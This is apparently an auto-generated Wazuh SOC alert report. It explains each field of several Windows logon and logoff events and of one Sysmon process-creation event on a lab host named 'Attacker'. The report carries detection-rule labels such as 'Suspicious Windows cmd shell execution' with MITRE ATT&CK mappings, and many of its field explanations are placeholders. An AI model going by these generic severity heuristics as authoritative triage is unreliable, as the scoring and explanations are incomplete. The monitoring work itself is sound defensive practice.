rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534986.2436639
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8727048Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43985
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  17252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x31C1A7D Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x31c1a7d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:46.042+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:46.042+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534986.2439107
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8801986Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43986
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  17252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x31B4686 Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x31b4686
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:46.073+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:46.073+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  65
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534986.2441575
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8808370Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43987
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  2444
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:46.160+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:46.160+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  66
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534986.2448912
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:19.2315020Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43989
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  17252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:49:48.407+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:48.407+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534988.2456251
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:01.5883830Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  344551
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:49:01.506 ProcessGuid: {94294ddc-bfdd-680a-a90c-000000000e00} ProcessId: 8208 Image: C:\Windows\System32\conhost.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Console Window Host Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: CONHOST.EXE CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 CurrentDirectory: C:\WINDOWS User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D ParentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} ParentProcessId: 3372 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:49:01.506
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bfdd-680a-a90c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8208
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\conhost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Console Window Host
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  CONHOST.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

